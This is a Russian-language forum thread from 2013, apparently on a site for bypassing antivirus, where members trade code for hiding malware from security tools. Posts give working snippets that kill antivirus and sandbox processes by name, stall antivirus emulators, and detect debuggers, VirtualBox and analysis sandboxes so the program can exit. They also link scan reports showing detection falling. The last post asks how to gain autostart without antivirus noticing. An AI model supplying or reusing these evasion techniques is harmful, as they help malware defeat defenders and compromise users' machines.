Наш Jabber-сервер расположен по адресу fuckav.in. Добро пожаловать!!! |
|
Для того, чтобы ответить в теме, необходимо зарегистрироваться. |
|
Опции темы | Опции просмотра |
08-01-2013 | #1 | |
Заблокирован
Последняя активность:
02-07-2013 Регистрация: 20.08.2012
Сообщений: 47
Поблагодарили всего: 106
за это сообщение: 2 |
Anti
Код:
Dim local As Process() = Process.GetProcesses Dim i As Integer For i = 0 To local.Length - 1 Debug.WriteLine(local(i).ProcessName) If Strings.UCase(local(i).ProcessName) = Strings.UCase("sample") Then 'Anubis local(i).Kill() If Strings.UCase(local(i).ProcessName) = Strings.UCase("outpost") Then 'Outpost local(i).Kill() If Strings.UCase(local(i).ProcessName) = Strings.UCase("npfmsg") Then 'Norman local(i).Kill() If Strings.UCase(local(i).ProcessName) = Strings.UCase("bdagent") Then 'Bitdefender local(i).Kill() If Strings.UCase(local(i).ProcessName) = Strings.UCase("kavsvc") Then 'Kaspersky local(i).Kill() If Strings.UCase(local(i).ProcessName) = Strings.UCase("egui") Then 'Nod32 local(i).Kill() If Strings.UCase(local(i).ProcessName) = Strings.UCase("zlclient") Then 'Zonealarm local(i).Kill() End If End If End If End If End If End If End If Next |
|
|
19-06-2013 | #2 | |
Windows v.1.01
Последняя активность:
10-07-2013 Регистрация: 29.12.2011
Сообщений: 11
Поблагодарили всего: 0
за это сообщение: 0 |
А как же массивы? Хоть что-то интересное?
|
|
20-06-2013 | #3 | |
Windows 100500
Последняя активность:
28-10-2013 Регистрация: 30.04.2011
Сообщений: 196
Поблагодарили всего: 173
за это сообщение: 4
кому надо тот знает.
|
мож кому пригодится, очень тупое затыкание эмулятора спермского и не только
Код:
for i := 1 to 1000000 do begin Randomize; OutputDebugString(Pchar(IntToStr(GetAsyncKeyState(i)+random(1000)))); end; http://scanner.fuckav.ru/report.php?id=51c257c26b150 было http://scanner.fuckav.ru/report.php?id=51c258a9a8281 стало спермский и мсье заткнулись. мелочь, а приятно была еще где-то функция детекта почти всех виртуалок, песочниц, и прочей срани. но я походу проебал ее если найду запилю сюда. Последний раз редактировалось St.Patrick; 20-06-2013 в 04:22. |
|
|
20-06-2013 | #4 | |
|
Цитата:
|
|
|
20-06-2013 | #5 | |||
Windows ME
Последняя активность:
17-05-2014 Регистрация: 20.04.2011
Сообщений: 230
Поблагодарили всего: 351
за это сообщение: 5 |
Я делаю почти так же. Только ещё проще.
Цитата:
Последний раз редактировалось hdsckr; 20-06-2013 в 18:44. |
|||
|
20-06-2013 | #6 |
|
hdsckr
Против анубиса всё еще катит чек параметра "SystemBiosVersion" в HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System - у них там "QEMU" или вроде того. |
|
21-06-2013 | #7 | ||
Заблокирован
Последняя активность:
17-02-2014 Регистрация: 11.05.2013
Сообщений: 188
Поблагодарили всего: 245
за это сообщение: 0 |
Тру блек-хет метод, спёртый из Оптимы. Набегай!
Детект отладки//виртмашины (спизжено)
Совсем забыл: юзать по таймеру с интервалом в сотку, ифками. Соотвественно if isDBG = 1 then ExitProcess(0); // к примеру *(вообще баян, но если немного подредачить - можно на основе этого что-нибудь да запилить ) Последний раз редактировалось upO; 21-06-2013 в 11:51. |
||
21-06-2013 | #8 | |
Windows 100500
Последняя активность:
28-10-2013 Регистрация: 30.04.2011
Сообщений: 196
Поблагодарили всего: 173
за это сообщение: 0
кому надо тот знает.
|
upO, всё кривые полу-рабочие баяны)
|
|
21-06-2013 | #9 | |
Заблокирован
Последняя активность:
17-02-2014 Регистрация: 11.05.2013
Сообщений: 188
Поблагодарили всего: 245
за это сообщение: 0 |
Последний раз редактировалось upO; 21-06-2013 в 11:54. |
|
21-06-2013 | #10 | |
Windows 100500
Последняя активность:
28-10-2013 Регистрация: 30.04.2011
Сообщений: 196
Поблагодарили всего: 173
за это сообщение: 0
кому надо тот знает.
|
|
|
21-06-2013 | #11 | |
Заблокирован
Последняя активность:
17-02-2014 Регистрация: 11.05.2013
Сообщений: 188
Поблагодарили всего: 245
за это сообщение: 0 |
Последний раз редактировалось upO; 21-06-2013 в 11:53. |
|
21-06-2013 | #12 | |
Windows 100500
Последняя активность:
28-10-2013 Регистрация: 30.04.2011
Сообщений: 196
Поблагодарили всего: 173
за это сообщение: 2
кому надо тот знает.
|
ну да, ну да IN EAX, DX в р3 это вообще лол) далее IsInVPC на вистовой ос с урезанными правами скорее всего закончится падением. a IsDebuggerPresent это пиздец товарищи.
|
|
21-06-2013 | #13 | |
Заблокирован
Последняя активность:
17-02-2014 Регистрация: 11.05.2013
Сообщений: 188
Поблагодарили всего: 245
за это сообщение: 0 |
Ну, не я писал данный метод
Дружно ругаем автора оптимы Последний раз редактировалось upO; 21-06-2013 в 11:53. |
|
21-06-2013 | #14 | |
Windows XP
Последняя активность:
2 недель(и) назад Регистрация: 24.11.2009
Сообщений: 270
Поблагодарили всего: 130
за это сообщение: 0
432871473
|
upO, а будет продолжение с модулями Graphics,Registry и Alpha-Skin?
Все таки спс что вытянул и дал народу посмеятсо)) это же надо,как ныне обходы пилят. Интересно,что скажут Апокалипс и Вазонез... |
|
21-06-2013 | #15 | |
Заблокирован
Последняя активность:
17-02-2014 Регистрация: 11.05.2013
Сообщений: 188
Поблагодарили всего: 245
за это сообщение: 2 |
Всегда рад доставить немного лулзов
Последний раз редактировалось upO; 21-06-2013 в 11:50. |
|
|
21-06-2013 | #16 | ||
Windows ME
Последняя активность:
17-05-2014 Регистрация: 20.04.2011
Сообщений: 230
Поблагодарили всего: 351
за это сообщение: 5 |
Антитрассировка
Цитата:
Последний раз редактировалось hdsckr; 21-06-2013 в 11:55. |
||
|
22-06-2013 | #17 | |
Windows 100500
Последняя активность:
28-10-2013 Регистрация: 30.04.2011
Сообщений: 196
Поблагодарили всего: 173
за это сообщение: 6
кому надо тот знает.
|
Код:
if LoadLibraryA(Pchar('VBoxHook.dll')) <> 0 then ExitProcess(0); if LoadLibraryA(Pchar('VBoxMRXNP.dll')) <> 0 then ExitProcess(0); Код:
function IsDBGPresent: boolean; assembler; asm mov eax, large fs:18h mov eax, [eax+30h] movzx eax, byte ptr [eax+2] cmp eax, 1 jne @ret @true: mov Result, True @ret: end; Добавлено через 16 минут еще виртуалбокс Код:
function IsVirtualBox: boolean; var hFile: Thandle; begin Result := False; hFile := CreateFileA(Pchar('\\.\VBoxMiniRdrDN'), GENERIC_READ or GENERIC_WRITE, 0, nil, OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL, 0); if( hFile <> INVALID_HANDLE_VALUE ) then begin CloseHandle(hFile); Result := TRUE; end; end; Последний раз редактировалось St.Patrick; 22-06-2013 в 04:01. Причина: Добавлено сообщение |
|
|
23-07-2013 | #18 |
|
А как записываться без палева в автозагрузку ? а обычную запись в реест палит дрвеб и прочие антивири - не хорошо получается =(
|
Для того, чтобы ответить в теме, необходимо зарегистрироваться. |
Метки |
begin, boolean, exitprocess, function, hfile |
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1) | |
Опции темы | |
Опции просмотра | |
|
|